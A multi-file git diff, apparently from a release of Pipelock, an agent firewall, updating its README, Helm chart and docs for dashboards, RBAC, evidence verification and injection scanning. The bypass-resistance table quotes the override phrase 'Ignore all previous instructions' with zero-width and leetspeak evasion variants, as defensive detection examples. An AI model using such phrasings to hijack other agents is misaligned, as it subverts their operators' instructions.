 | **Learn-and-Lock** (v2.4) | Per-agent behavioral contracts: observe an agent's real traffic, compile a signed candidate contract, replay captured observations in shadow, ratify per rule, promote the signed active manifest, and **enforce live** on every URL-bearing transport plus the MCP tool-call surface (forward, reverse + redirect, intercept, /fetch, WebSocket, MCP HTTP, MCP stdio bridge, MCP stdio subprocess). Lifecycle, shadow, and runtime `proxy_decision` receipts use `EvidenceReceipt v2`; shadow receipts are bound to the candidate contract hash, while lifecycle/runtime receipts are bound to the active manifest hash after promotion. Scanner block always wins over contract allow on every gated path. See [learn-and-lock guide](docs/guides/learn-and-lock.md). |
 | **Block-Reason Header** (v2.4) | `X-Pipelock-Block-Reason` response header on every HTTP-capable block path (forward / intercept / fetch / reverse / MCP HTTP / WebSocket close-frame payload) with a fixed reason vocabulary, severity tier, and retry hint. MCP-internal JSON-RPC blocks (`tool_poisoning`, `tool_chain_blocked`, MCP stdio) carry the same reason vocabulary on the JSON-RPC error metadata where there is no HTTP response surface. Lets agents react intelligently to a block without parsing the body. See [block-reason header](docs/guides/block-reason-header.md). |
 | **Wedge-Detection Watchdog** (v2.4) | `health_watchdog` returns `/health` 503 when a subsystem heartbeat goes stale (proxy hot path, MCP listeners, rules-engine reload watcher), so cluster liveness probes detect a wedged scanner automatically. Optional `expose_subsystems: true` adds a per-subsystem map for operator dashboards. See [health endpoint guide](docs/guides/health.md). |
@@ -472,11 +474,12 @@ Details, config examples, and gap analysis: [docs/owasp-mapping.md](docs/owasp-m
 | [Scan API](docs/scan-api.md) | Evaluation endpoint for programmatic scanning |
 | [Deployment Recipes](docs/guides/deployment-recipes.md) | Docker Compose, K8s sidecar, iptables, macOS PF |
 | [`pipelock doctor`](docs/cli/doctor.md) | Configured-vs-enforceable deployment diagnostics for proxy, TLS, MCP, file_sentry, telemetry, and containment signals |
+| [`pipelock dashboard`](docs/cli/dashboard.md) | Operator dashboard setup: auth modes, RBAC permissions, evidence, exemptions, budgets, trust and keys, fleet views, backup/restore, and coverage certificates |
 | [`pipelock verify-install`](docs/cli/verify-install.md) | Deterministic scanning, local proof, and direct-egress smoke checks |
 | [`pipelock update`](docs/cli/update.md) | Verified self-update: signed release manifest, checksum verification, optional cosign cross-check, atomic install, rollback |
 | [Bypass Resistance](docs/bypass-resistance.md) | Known evasion techniques, mitigations, limitations |
 | [Known Attacks Blocked](docs/attacks-blocked.md) | Real attacks with repro snippets |
-| [SIEM Integration](docs/guides/siem-integration.md) | Log schema, forwarding patterns, SIEM queries |
+| [SIEM Integration](docs/guides/siem-integration.md) | Log schema, CEF/syslog output, durable Enterprise forwarding, lifecycle, metrics, SIEM queries |
 | [Metrics Reference](docs/metrics.md) | Prometheus metric families, labels, JSON stats, and alert rules |
 | [Community Rules](docs/rules.md) | Install, configure, and create signed rule bundles |
 | [Security Assurance](docs/security-assurance.md) | Security model, trust boundaries, supply chain |

--- a/charts/pipelock/Chart.yaml
+++ b/charts/pipelock/Chart.yaml
@@ -39,6 +39,6 @@ annotations:
     - kind: added
       description: Dashboard mTLS/OIDC/token authentication, RBAC permissions, exemption lifecycle records, coverage certificates, backup/restore, and durable SIEM forwarding.
     - kind: fixed
-      description: Rekor anchoring now requires an explicit URL, supports sha256 or sha512 hashedrekord submissions, and verifies anchored receipts with pinned Rekor log keys.
+      description: Rekor anchoring now requires an explicit URL, submits Ed25519 Rekor v1 hashedrekord entries with sha512 by default, and verifies anchored receipts with pinned Rekor log keys.
     - kind: fixed
       description: Reloads fail closed when bundle-resolution errors would drop live detections; coverage-certificate verification fails closed on untrusted pinned signers.

--- a/charts/pipelock/Chart.yaml
+++ b/charts/pipelock/Chart.yaml
@@ -2,8 +2,8 @@ apiVersion: v2
 name: pipelock
 description: Agent firewall for AI agents. Network scanning, process containment, and tool policy enforcement.
 type: application
-version: 0.6.0
-appVersion: "3.0.0"
+version: 0.7.0
+appVersion: "3.1.0"
 home: https://pipelab.org
 sources:
   - https://github.com/luckyPipewrench/pipelock
@@ -31,14 +31,14 @@ annotations:
       url: https://github.com/luckyPipewrench/pipelock-verify-python
   artifacthub.io/changes: |
     - kind: added
-      description: Pipelock appVersion 3.0.0. Conductor follower decommission (un-enroll) and offline control-plane backup/restore for disaster recovery.
+      description: Pipelock appVersion 3.1.0. Operator dashboard revamp with evidence, agents, budgets, trust and keys, fleet overview, signed-action workbench, incident cockpit, and a free single-session evidence viewer.
     - kind: added
-      description: Conductor control-plane hardening - cross-host clock-skew tolerance on control messages, stream-switch authorization with bounded validity.
+      description: Conductor dry-run and decision replay for publish, kill, resume, and rollback actions, plus runtime/apply-state drift preflight for policy publish.
     - kind: changed
-      description: Security-hardening defaults that fail closed (breaking on upgrade) - MCP responses block by default unless a server is marked reasoning-trust, api_allowlist no longer ships messaging platforms, require-intermediate license mode now mandates a CRL, stricter provider-key DLP. See release notes for upgrade steps.
+      description: Receipt and evidence verification hardening - strict unknown-field rejection, durable session lifecycle evidence, evidence-health metrics, cross-language verifier parity, and honest kernel_observed containment wording.
     - kind: added
-      description: Free verifier support for offline Fleet Receipt Reports.
+      description: Dashboard mTLS/OIDC/token authentication, RBAC permissions, exemption lifecycle records, coverage certificates, backup/restore, and durable SIEM forwarding.
     - kind: fixed
-      description: Image digest rendering now uses repository@sha256 instead of placing a digest in the tag field.
+      description: Rekor anchoring now requires an explicit URL, supports sha256 or sha512 hashedrekord submissions, and verifies anchored receipts with pinned Rekor log keys.
     - kind: fixed
-      description: Security fixes for scanner fail-closed behavior, support-bundle redaction, and signing-key loading.
+      description: Reloads fail closed when bundle-resolution errors would drop live detections; coverage-certificate verification fails closed on untrusted pinned signers.

--- a/cmd/pipelock-release-manifest/main.go
+++ b/cmd/pipelock-release-manifest/main.go
@@ -40,7 +40,7 @@ func run(args []string, stdout, stderr io.Writer) error {
 	fs := flag.NewFlagSet("pipelock-release-manifest", flag.ContinueOnError)
 	fs.SetOutput(stderr)
 	dist := fs.String("dist", "dist", "GoReleaser dist directory")
-	tag := fs.String("tag", "", "release tag, e.g. v3.0.0")
+	tag := fs.String("tag", "", "release tag, e.g. v3.1.0")
 	commit := fs.String("commit", "", "release commit SHA")
 	keyHex := fs.String("private-key-hex", "", "hex Ed25519 private key or 32-byte seed; required only with --sign-only")
 	signerKeyID := fs.String("signer-key-id", firstReleaseKey(os.Getenv("RELEASE_KEYRING_HEX")), "hex Ed25519 public key expected to sign release.json")

--- a/docs/bypass-resistance.md
+++ b/docs/bypass-resistance.md
@@ -71,7 +71,7 @@ These techniques hide injection payloads in fetched content or MCP tool results.
 
 | Technique | Example | Status | How |
 |-----------|---------|----------|-----|
-| Basic injection | "Ignore all previous instructions" | Tested | 29 built-in patterns, case-insensitive |
+| Basic injection | "Ignore all previous instructions" | Tested | 32 built-in patterns, case-insensitive |
 | Zero-width splitting | `ignore\u200ball\u200bprevious` | Tested | Pass 1: strip ZW chars |
 | Word boundary collapse | Words merged after ZW removal | Tested | Pass 2: replace invisible with space, re-scan |
 | Leetspeak substitution | `1GN0R3 4LL PR3V10US` | Tested | Pass 3: digit-to-letter folding |

--- a/docs/cli/README.md
+++ b/docs/cli/README.md
@@ -7,7 +7,7 @@ the full command tree and `pipelock <command> --help` for any command's flags.
 |---|---|
 | [`pipelock baseline`](baseline.md) | Inspect, ratify, and relearn behavioral-baseline profiles through the admin API. |
 | [`pipelock demo`](demo.md) | Run self-contained attack scenarios that show what Pipelock catches. |
-| [`pipelock quickstart/status/presets`](operator.md) | Read-only operator setup and local inspection commands. |
+| [`pipelock status`](operator.md) | Read-only operator setup and local inspection commands. |
 | [`pipelock scan`](scan.md) | Scan files for invisible-Unicode and bidi-control injection. |
 | [`pipelock skill-scan`](skill-scan.md) | Inventory skill files, compare lock drift, and flag conservative source-to-sink combinations. |
 | [`pipelock doctor`](doctor.md) | Audit whether configured protections are actually enforceable in the current topology. |

--- a/docs/cli/README.md
+++ b/docs/cli/README.md
@@ -7,6 +7,7 @@ the full command tree and `pipelock <command> --help` for any command's flags.
 |---|---|
 | [`pipelock baseline`](baseline.md) | Inspect, ratify, and relearn behavioral-baseline profiles through the admin API. |
 | [`pipelock demo`](demo.md) | Run self-contained attack scenarios that show what Pipelock catches. |
+| [`pipelock quickstart/status/presets`](operator.md) | Read-only operator setup and local inspection commands. |
 | [`pipelock scan`](scan.md) | Scan files for invisible-Unicode and bidi-control injection. |
 | [`pipelock skill-scan`](skill-scan.md) | Inventory skill files, compare lock drift, and flag conservative source-to-sink combinations. |
 | [`pipelock doctor`](doctor.md) | Audit whether configured protections are actually enforceable in the current topology. |

--- a/docs/cli/dashboard.md
+++ b/docs/cli/dashboard.md
@@ -26,6 +26,26 @@ a license that grants the `agents` feature (Pro or Enterprise); without one it
 refuses to start. The dashboard is read-only: it renders evidence and never
 mutates policy, receipts, or runtime state.
 
+## Views and license tiers
+
+All views use the same dedicated listener, authentication boundary, CSP, access
+audit, and metadata-versus-raw redaction model.
+
+| View | Route | License feature | Permission | What it proves |
+|---|---|---|---|---|
+| Overview | `/overview` | `agents` | `dashboard:evidence:read` | Ranked red/amber facts from the loaded evidence, fleet, governance, budget, and trust sources; no rolled-up green verdict. |
+| Evidence | `/` and `/session/...` | `agents` | `dashboard:evidence:read` | Per-session receipt scorecard, timeline, and decision explanation from the configured recorder directory. |
+| Exemptions | `/exemptions` | `agents` | `dashboard:exemptions:read` | Read-only exemption inventory from `--config`, with lifecycle metadata overlaid from `--exemption-store` when configured. |
+| Agents | `/agents` and `/agent/...` | `agents` | `dashboard:agents:read` | Cross-session agent grouping and bounded scorecard rollups; absence means no loaded receipts, not proof the agent was idle. |
+| Budgets | `/budgets` | `agents` | `dashboard:budgets:read` | Counts-only per-agent budget pressure from `--runtime-snapshot-file` or the default runtime snapshot. |
+| Trust & Keys | `/trust-keys` | `agents` | `dashboard:trust_keys:read` | Trusted-key provenance, receipt blast radius, revocation status where verifiable, and local/Rekor anchor consistency. |
+| Fleet | `/fleet` | `fleet` | `dashboard:fleet:read` | Enrolled follower runtime and signed applied-state status from the configured Conductor read source. |
+| Workbench | `/workbench` | `fleet` | `dashboard:signed_action:read` | Prepare, dry-run, and replay guidance for signed Conductor actions; no write path. |
+| Incident | `/incident` | `fleet` | `dashboard:incident:read` | Read-only correlation of a conductor decision, replay divergence, and fleet applied-state summary. |
+
+Grant `dashboard:raw:read` only as an extra elevation. It is never enough by
+itself to reach a route; the principal also needs that route's read permission.
+
 ## `pipelock dashboard serve`
 
 ```bash
@@ -33,6 +53,7 @@ pipelock dashboard serve \
   --receipt-dir /var/lib/pipelock/evidence \
   --config /etc/pipelock/pipelock.yaml \
   --legal-hold-store /var/lib/pipelock/legal-holds.json \
+  --exemption-store /var/lib/pipelock/exemptions.json \
   --auth-token-file /etc/pipelock/dashboard.token \
   --trusted-signer 'file=/etc/pipelock/receipt-signing.pub,source=ops runbook' \
   --conductor-url https://127.0.0.1:8895 \
@@ -87,8 +108,15 @@ startup error.
 | `--auth-token-file` | none | File containing the operator token for token-authenticated requests. Required unless OIDC or `--require-client-cert` is configured. Grants the redacted metadata view. |
 | `--raw-token-file` | none | Optional second, higher-privilege token that unlocks raw destinations and signed payloads. Must differ from `--auth-token-file`. |
 | `--legal-hold-store` | none | Optional atomic JSON legal-hold metadata store displayed read-only by the governance sections. |
+| `--exemption-store` | none | Optional exemption lifecycle store. Overlays owner, reason, expiry, and last-match metadata onto the read-only Exemptions inventory. |
+| `--delivery-inbox` | none | Optional alert delivery inbox file for read-only delivery-health and dead-letter status. |
+| `--read-model-index` | none | Optional rebuilt dashboard read-model index file for freshness/source-hash status. Rebuild with `pipelock dashboard rebuild-read-model`. |
+| `--runtime-snapshot-file` | `<receipt-dir>/dashboard/runtime-snapshot.json` | Counts-only proxy runtime snapshot used by the Budgets view. |
 | `--listen` | `127.0.0.1:8896` | Dashboard listener address. Non-loopback addresses require `--tls-cert`/`--tls-key`. |
 | `--trusted-signer` | none | Trusted receipt signing key: `(inline=HEX_OR_VERSIONED_PUBLIC_KEY\|file=/path)[,source=LABEL]`. Repeatable. `source` is shown in the UI as the reason the key is trusted. |
+| `--anchor-expected` | `false` | Treat a session with no anchor-state marker as an anchor audit failure in Trust & Keys. |
+| `--anchor-local-log` | none | Local anchor log used to verify anchor bundles produced with the local backend. |
+| `--rekor-log-key` | none | Pinned Rekor log public key for verifying Rekor SET, checkpoint, and inclusion proof. Repeat for rotations. |
 | `--license-crl-file` | none | Signed license revocation list; falls back to `PIPELOCK_LICENSE_CRL_FILE`. |
 | `--tls-cert`, `--tls-key` | none | TLS server certificate and key. Both or neither. |
 | `--oidc-issuer` | none | OIDC issuer URL used for discovery and exact issuer validation. |
@@ -132,11 +160,23 @@ roles:
     permissions:
       - dashboard:evidence:read
       - dashboard:exemptions:read
+      - dashboard:agents:read
+      - dashboard:budgets:read
+      - dashboard:trust_keys:read
   raw:
     permissions:
       - dashboard:evidence:read
       - dashboard:exemptions:read
+      - dashboard:agents:read
+      - dashboard:budgets:read
+      - dashboard:trust_keys:read
       - dashboard:raw:read
+  fleet-auditor:
+    permissions:
+      - dashboard:evidence:read
+      - dashboard:fleet:read
+      - dashboard:signed_action:read
+      - dashboard:incident:read
 certificates:
   0000000000000000000000000000000000000000000000000000000000000000: metadata
 ```
@@ -197,6 +237,25 @@ permissions with `--oidc-role-map`. The role claim can be `azp` (the client ID,
 useful for a single-client deployment) or a groups/roles claim your provider
 adds to the token. As with the mTLS role map, permissions must come from the
 dashboard's bounded vocabulary and an unmapped principal is denied.
+
+Example OIDC role map:
+
+```json
+{
+  "claim_values": {
+    "pipelock-dashboard-auditor": "auditor"
+  },
+  "roles": {
+    "auditor": [
+      "dashboard:evidence:read",
+      "dashboard:exemptions:read",
+      "dashboard:agents:read",
+      "dashboard:budgets:read",
+      "dashboard:trust_keys:read"
+    ]
+  }
+}
+```
 
 ### License resolution
 
@@ -274,6 +333,106 @@ offline `pipelock-verifier verify-run` command that re-verifies the same
 receipts against the trusted key, so anything the dashboard claims can be
 independently re-checked against the signed evidence — without trusting this
 server.
+
+## Free single-session evidence server
+
+`pipelock evidence serve` is the no-license, single-agent counterpart to the
+Pro dashboard Evidence view. It binds exactly one session at startup and has no
+route or query parameter that can switch to another session.
+
+```bash
+pipelock evidence serve \
+  --receipt-dir /var/lib/pipelock/evidence \
+  --session agent-a \
+  --listen 127.0.0.1:8897
+```
+
+If the receipt directory contains only one session, `--session` can be omitted.
+If it contains multiple sessions, `--session` is required so the free viewer
+cannot enumerate other agents.
+
+## Exemption lifecycle store
+
+The Exemptions page reads config state; lifecycle mutation stays in the CLI.
+Create and maintain lifecycle records with the `dashboard exemption` command
+family, then point `dashboard serve` at the same store:
+
+```bash
+pipelock dashboard exemption add \
+  --store /var/lib/pipelock/exemptions.json \
+  --scope response_scanning.exempt_domains:api.vendor.example \
+  --owner security-team \
+  --reason "vendor docs include benign instruction-like examples" \
+  --expiry 2026-10-01T00:00:00Z
+
+pipelock dashboard exemption list --store /var/lib/pipelock/exemptions.json
+pipelock dashboard exemption renew --store /var/lib/pipelock/exemptions.json --id exm_0123456789abcdef --expiry 2026-12-01T00:00:00Z
+pipelock dashboard exemption expire --store /var/lib/pipelock/exemptions.json --id exm_0123456789abcdef
+```
+
+`add`, `renew`, `expire`, `touch`, `remove`, and `list` are the mutation and
+inspection surface. Use the `exm_...` ID printed by `add` or `list` when
+renewing or expiring a record. The HTTP dashboard overlays
+owner/reason/expiry/status read-only and redacts owner/reason unless the
+request has raw access.
+
+## Coverage certificates
+
+A coverage certificate is a signed statement about one agent over a time window.
+It summarizes mediated-egress receipt integrity and completeness for that agent
+only; it does not claim all agent activity or no bypass outside Pipelock.
+
+Generate requires the Pro `agents` feature:
+
+```bash
+pipelock dashboard coverage-cert generate \
+  --receipt-dir /var/lib/pipelock/evidence \
+  --agent agent-a \
+  --window-start 2026-07-01T00:00:00Z \
+  --window-end 2026-07-12T00:00:00Z \
+  --signing-key /etc/pipelock/keys/coverage-cert.key \
+  --out agent-a-coverage.json
+```
+
+Verify is free and offline:
+
+```bash
+pipelock evidence verify-cert \
+  --cert agent-a-coverage.json \
+  --trusted-signer file=/etc/pipelock/keys/coverage-cert.pub,source=security-team
+```
+
+With a `--trusted-signer` set, verification exits non-zero when the certificate
+signer is not trusted. With no trusted signer, verification is structural-only.
+
+## Backup, restore, and read-model rebuild
+
+Dashboard durable stores are the JSON files that cannot be reconstructed from
+receipts, such as exemption lifecycle state, legal holds, and delivery inbox
+state. Keep those stores under one state directory and back up that directory:
+
+```bash
+pipelock dashboard backup \
+  --state-dir /var/lib/pipelock/dashboard \
+  --output /var/backups/pipelock-dashboard-state.tar
+
+pipelock dashboard restore \
+  --state-dir /var/lib/pipelock/dashboard \
+  --input /var/backups/pipelock-dashboard-state.tar
+```
+
+Restore validates the archive and writes each file atomically with best-effort
+whole-set rollback. It is not a cross-file transaction; if a process crashes
+between file writes, re-run restore to converge.
+
+The read model is disposable and should be rebuilt from recorder evidence, not
+backed up as authority:
+
+```bash
+pipelock dashboard rebuild-read-model \
+  --receipt-dir /var/lib/pipelock/evidence \
+  --output /var/lib/pipelock/dashboard/read-model-index.json
+```
 
 ## Legal-hold metadata
 

--- a/docs/cli/dashboard.md
+++ b/docs/cli/dashboard.md
@@ -52,8 +52,8 @@ itself to reach a route; the principal also needs that route's read permission.
 pipelock dashboard serve \
   --receipt-dir /var/lib/pipelock/evidence \
   --config /etc/pipelock/pipelock.yaml \
-  --legal-hold-store /var/lib/pipelock/legal-holds.json \
-  --exemption-store /var/lib/pipelock/exemptions.json \
+  --legal-hold-store /var/lib/pipelock/dashboard/legal-holds.json \
+  --exemption-store /var/lib/pipelock/dashboard/exemptions.json \
   --auth-token-file /etc/pipelock/dashboard.token \
   --trusted-signer 'file=/etc/pipelock/receipt-signing.pub,source=ops runbook' \
   --conductor-url https://127.0.0.1:8895 \
@@ -414,10 +414,14 @@ state. Keep those stores under one state directory and back up that directory:
 ```bash
 pipelock dashboard backup \
   --state-dir /var/lib/pipelock/dashboard \
+  --legal-hold-store /var/lib/pipelock/dashboard/legal-holds.json \
+  --exemption-store /var/lib/pipelock/dashboard/exemptions.json \
   --output /var/backups/pipelock-dashboard-state.tar
 
 pipelock dashboard restore \
   --state-dir /var/lib/pipelock/dashboard \
+  --legal-hold-store /var/lib/pipelock/dashboard/legal-holds.json \
+  --exemption-store /var/lib/pipelock/dashboard/exemptions.json \
   --input /var/backups/pipelock-dashboard-state.tar
 ```
 

--- a/docs/cli/explain.md
+++ b/docs/cli/explain.md
@@ -40,6 +40,28 @@ The remediation guidance is the point of the command: a hint must name a knob th
 | `--config`, `-c` | built-in defaults | Config file to load. Without it, the built-in default config is used. |
 | `--json` | `false` | Emit a structured report instead of human-readable text. |
 
+## `pipelock explain event`
+
+`pipelock explain event <id>` looks up a past decision in a Pipelock JSONL audit
+log and explains the operator-facing reason. It matches `request_id` first,
+then `event_id` and `id`, and it uses the configured DLP rules when redacting
+untrusted log content before printing it.
+
+```bash
+pipelock explain event req-abc-123 \
+  --config /etc/pipelock/pipelock.yaml \
+  --log /var/log/pipelock/audit.jsonl
+
+pipelock explain event req-abc-123 \
+  --config /etc/pipelock/pipelock.yaml \
+  --log /var/log/pipelock/audit.jsonl \
+  --json
+```
+
+When `--log` is omitted, the command uses `logging.file` from the config when
+that config writes JSONL audit events to a file. The command is read-only: it
+does not contact the proxy and does not mutate the log.
+
 ## Exit codes
 
 | Exit code | Meaning |

--- a/docs/cli/explain.md
+++ b/docs/cli/explain.md
@@ -62,7 +62,10 @@ When `--log` is omitted, the command uses `logging.file` from the config when
 that config writes JSONL audit events to a file. The command is read-only: it
 does not contact the proxy and does not mutate the log.
 
-## Exit codes
+## URL explanation exit codes
+
+These exit codes apply to `pipelock explain <url>`. `pipelock explain event`
+uses normal command success/failure semantics for log lookup and rendering.
 
 | Exit code | Meaning |
 |---|---|

--- a/docs/cli/operator.md
+++ b/docs/cli/operator.md
@@ -1,0 +1,46 @@
+# Operator convenience commands
+
+These commands are read-only and are meant for setup, triage, and local
+inspection. They do not contact a running proxy unless their help text says so,
+and they do not mutate runtime state.
+
+## `pipelock quickstart`
+
+Prints a concrete getting-started walkthrough using shipped commands:
+
+```bash
+pipelock quickstart
+```
+
+Use this when an operator has installed the binary and wants the shortest path
+from no config to a local smoke test.
+
+## `pipelock status`
+
+Loads the effective local config and prints mode, listeners, scanner switches,
+license state, and kill-switch sources. It stats a configured kill-switch
+sentinel file so the report reflects that source, but it does not change the
+sentinel, contact the proxy, or reload anything.
+
+```bash
+pipelock status --config /etc/pipelock/pipelock.yaml
+pipelock status --config /etc/pipelock/pipelock.yaml --json
+```
+
+The JSON form is suitable for local automation that needs to confirm which
+config and scanner set a process would use before starting it.
+
+## `pipelock presets`
+
+Lists every built-in config preset accepted by
+`pipelock generate config --preset NAME`, including mode, default action, and
+reachability posture.
+
+```bash
+pipelock presets
+pipelock generate config --list
+pipelock generate config --preset balanced > pipelock.yaml
+```
+
+Use `pipelock presets` before choosing a preset for a new deployment; use
+`generate config --list` when you are already in the config-generation flow.

--- a/docs/cli/update.md
+++ b/docs/cli/update.md
@@ -16,7 +16,7 @@ the update and leaves the installed binary untouched.
 pipelock update              # interactive update to the latest release
 pipelock update --check      # report current vs latest; change nothing
 pipelock update --yes        # update without the confirmation prompt
-pipelock update --version v3.0.0   # install a specific release tag
+pipelock update --version v3.1.0   # install a specific release tag
 pipelock update --rollback   # restore the previous binary from <binary>.bak
 pipelock update --json       # machine-readable status
 pipelock update --insecure-skip-signature   # deprecated no-op (native signature verification is always required)

--- a/docs/comparison.md
+++ b/docs/comparison.md
@@ -106,7 +106,7 @@ The matrix below compares Pipelock to earlier-generation tools (AIP, agentsh, sr
 mcp-scan focuses on MCP-specific auditing and policy checks around server/tool risk. Pipelock scans mediated traffic with pattern matching, Unicode normalization, entropy analysis, and covers HTTP and WebSocket traffic in addition to MCP. They're complementary: mcp-scan for MCP-specific auditing and guardrails, Pipelock for deep content inspection across cross-transport agent egress.
 
 ### Pipelock vs Docker MCP Gateway
-Docker MCP Gateway aggregates MCP servers and provides Docker-native MCP lifecycle and gatewaying. Pipelock provides deep content inspection (65 DLP patterns, BIP-39 seed phrase detection, 29 injection detection patterns, entropy analysis, tool poisoning, and request-body prompt-injection hard-blocking) across more than MCP. They're complementary: Gateway handles Docker-native routing and lifecycle, while Pipelock handles content inspection and signed mediation evidence.
+Docker MCP Gateway aggregates MCP servers and provides Docker-native MCP lifecycle and gatewaying. Pipelock provides deep content inspection (65 DLP patterns, BIP-39 seed phrase detection, 32 injection detection patterns, entropy analysis, tool poisoning, and request-body prompt-injection hard-blocking) across more than MCP. They're complementary: Gateway handles Docker-native routing and lifecycle, while Pipelock handles content inspection and signed mediation evidence.
 
 ## Using Tools Together
 

--- a/docs/configuration.md
+++ b/docs/configuration.md
@@ -870,16 +870,16 @@ response_scanning:
 | `enabled` | `true` | Enable response scanning |
 | `action` | `"warn"` | block, strip, warn, or ask (HITL) |
 | `ask_timeout_seconds` | `30` | Timeout for human-in-the-loop approval |
-| `include_defaults` | `true` | Merge with 29 built-in patterns |
+| `include_defaults` | `true` | Merge with 32 built-in patterns |
 | `exempt_domains` | `[]` | Hosts to skip injection scanning for (DLP still applies on outbound). Supports `*.example.com` wildcards (also matches the apex `example.com`). |
 | `size_exempt_domains` | `[]` | Trusted hosts whose oversized forward-proxy, TLS-intercepted, or reverse-proxy responses use the larger bounded whole-buffer scan ceiling instead of failing the normal scan cap. |
 | `size_exempt_scan_max_bytes` | `67108864` | Maximum bytes read into memory for one over-cap response from a `size_exempt_domains` host before the existing response scanners run. Exceeding this ceiling blocks fail-closed with no upstream bytes delivered. |
 | `size_exempt_scan_max_inflight_bytes` | `268435456` | Per-proxy-instance memory reservation budget for concurrent over-cap size-exempt scans. If a scan cannot reserve its ceiling immediately, the response blocks fail-closed instead of waiting. |
 | `unscannable_passthrough` | `[]` | Structured allowlist for deliberately unscannable opaque artifact responses. Matching entries stream unscanned and emit an audit warning plus an allow receipt on every use. Requires `host`, exact `paths`, non-textual `content_types`, `reason`, and non-expired `expires`; optional `added` documents the entry. The host must also match `size_exempt_domains`, the response must exceed the normal scan cap, include a positive `Content-Length`, and declare `Content-Disposition: attachment`. |
 | `mcp_servers` | `[]` | Per-MCP-server response trust classes keyed by `pipelock mcp proxy --server-name`. Omitted, missing, malformed, or non-matching servers are treated as `untrusted` and block response-injection findings. `reasoning` is an explicit opt-in that logs/warns but forwards the response. |
-| `patterns` | 29 built-in | Injection and state/control poisoning patterns |
+| `patterns` | 32 built-in | Injection and state/control poisoning patterns |
 
-**Built-in patterns (29):** Prompt-injection and state/control poisoning coverage includes jailbreak phrases, system overrides, role overrides, instruction manipulation, encoded payloads, tool invocation commands, authority escalation, credential solicitation, credential path directives, auth material requirements, memory persistence directives, preference poisoning, covert-action directives, silent credential handling, and CJK-language override patterns. All patterns use DOTALL mode to match across newlines in multiline tool output.
+**Built-in patterns (32):** Prompt-injection and state/control poisoning coverage includes jailbreak phrases, system overrides, role overrides, instruction manipulation, encoded payloads, tool invocation commands, authority escalation, credential solicitation, credential path directives, auth material requirements, memory persistence directives, preference poisoning, covert-action directives, silent credential handling, and CJK-language override patterns. All patterns use DOTALL mode to match across newlines in multiline tool output.
 
 **Actions:**
 - **block:** reject the response entirely, agent gets an error
@@ -2317,6 +2317,17 @@ flight_recorder:
   max_entries_per_file: 10000
   raw_escrow: false
   escrow_public_key: ""
+  completeness:
+    heartbeat_interval: 60s
+  evidence_health:
+    enabled: true
+    self_audit_interval: 30s
+    max_anchor_lag: 24h
+
+dashboard_snapshot:
+  enabled: true
+  path: /var/lib/pipelock/evidence/dashboard/runtime-snapshot.json
+  interval: 10s
 ```
 
 | Field | Default | Description |
@@ -2332,8 +2343,24 @@ flight_recorder:
 | `max_entries_per_file` | `10000` | Rotate to a new file after this many entries |
 | `raw_escrow` | `false` | Encrypt raw (pre-redaction) detail to sidecar files |
 | `escrow_public_key` | (required if raw_escrow) | X25519 public key (hex) for escrow encryption |
+| `completeness.heartbeat_interval` | `60s` | Restart-only interval for signed session heartbeat records. Must parse as a positive duration and be no more than 24h. |
+| `evidence_health.enabled` | `true` | Enable observability-only evidence health grading and `/stats` evidence-health output. This does not gate traffic. |
+| `evidence_health.self_audit_interval` | `30s` | Evidence self-audit interval. Must be between 5s and 10m. |
+| `evidence_health.max_anchor_lag` | `24h` | Maximum accepted age/lag window for anchor freshness reporting. A stale or missing anchor lowers the reported grade; it cannot fabricate health. |
 
-Evidence files are named `evidence-<session>-<seq>.jsonl`. Each entry contains a SHA-256 hash of its predecessor, forming a tamper-evident chain. Action receipts form a second chain within the evidence log (each receipt links to the previous receipt via `chain_prev_hash`). Breaking either chain is detectable by `pipelock integrity verify`.
+### Dashboard Runtime Snapshot
+
+`dashboard_snapshot` controls the proxy-produced, counts-only runtime snapshot
+used by `pipelock dashboard serve` for the Budgets view. It is operational
+state, excluded from the canonical policy hash, and restart-only on reload.
+
+| Field | Default | Description |
+|-------|---------|-------------|
+| `enabled` | omitted | Tri-state. Omitted writes a snapshot when `flight_recorder.dir` is configured; `false` disables it; `true` forces it and requires either `path` or `flight_recorder.dir`. |
+| `path` | `<flight_recorder.dir>/dashboard/runtime-snapshot.json` | Snapshot path. Counts and limits only; no destinations, bodies, arguments, or tokens. |
+| `interval` | `10s` | Snapshot write interval. Must parse as a duration and be at least 1s. |
+
+Evidence files are named `evidence-<session>-<seq>.jsonl`. Each entry contains a SHA-256 hash of its predecessor, forming a tamper-evident chain. Action receipts form a second chain within the evidence log (each receipt links to the previous receipt via `chain_prev_hash`). Breaking the receipt chain is detectable by `pipelock verify-receipt --chain /var/lib/pipelock/evidence --key /etc/pipelock/keys/receipt.pub`; file-manifest drift is checked separately with `pipelock integrity check /path/to/workspace`.
 
 ## Learn and Lock
 

--- a/docs/guides/health.md
+++ b/docs/guides/health.md
@@ -15,10 +15,10 @@ Healthy response (HTTP 200):
 ```json
 {
   "status": "healthy",
-  "version": "v3.0.0",
+  "version": "v3.1.0",
   "mode": "balanced",
   "uptime_seconds": 1234.56,
-  "dlp_patterns": 66,
+  "dlp_patterns": 65,
   "response_scan_enabled": true,
   "git_protection_enabled": false,
   "rate_limit_enabled": true,
@@ -42,7 +42,7 @@ Unhealthy response (HTTP 503):
 ```json
 {
   "status": "unhealthy",
-  "version": "v3.0.0",
+  "version": "v3.1.0",
   ...
   "subsystems": {
     "scanner": false,

--- a/docs/guides/receipt-verification.md
+++ b/docs/guides/receipt-verification.md
@@ -184,15 +184,38 @@ Chain verification checks:
 
 - Every receipt's Ed25519 signature is valid against its signer key.
 - `chain_seq` increments by exactly 1 from 0 to N-1 (per segment; see rotation below).
-- The first receipt has `chain_prev_hash: "genesis"`.
+- The first receipt either has the legacy `chain_prev_hash: "genesis"` or a
+  v3.1 bound-genesis `g1:<sha256>` value derived from the signed
+  `session_open` record.
 - Each subsequent receipt's `chain_prev_hash` equals the SHA-256 hash of
   the previous receipt's canonical JSON.
+- Signed v1 objects reject unknown fields. Only the unsigned top-level `ext`
+  object may carry advisory forward-compatible metadata, and it never
+  contributes to a verified claim.
 
 As with a single receipt, an unpinned chain run (no `--key`) prints
 `CHAIN UNPINNED` and exits non-zero unless you pass `--allow-unpinned`; pinning
 the key is what proves the chain came from a signer you trust.
 
 If any check fails, the output reports which sequence number broke the chain.
+
+### Completeness analysis
+
+`pipelock-verifier completeness` analyzes the signed session lifecycle evidence
+in a receipt chain. The best possible result is LIMITED, never COMPLETE, PASS,
+or OK: Pipelock can bound mediated egress it observed, but cannot prove the
+agent had no path outside that boundary.
+
+```bash
+pipelock-verifier completeness /var/lib/pipelock/evidence \
+  --session agent-a \
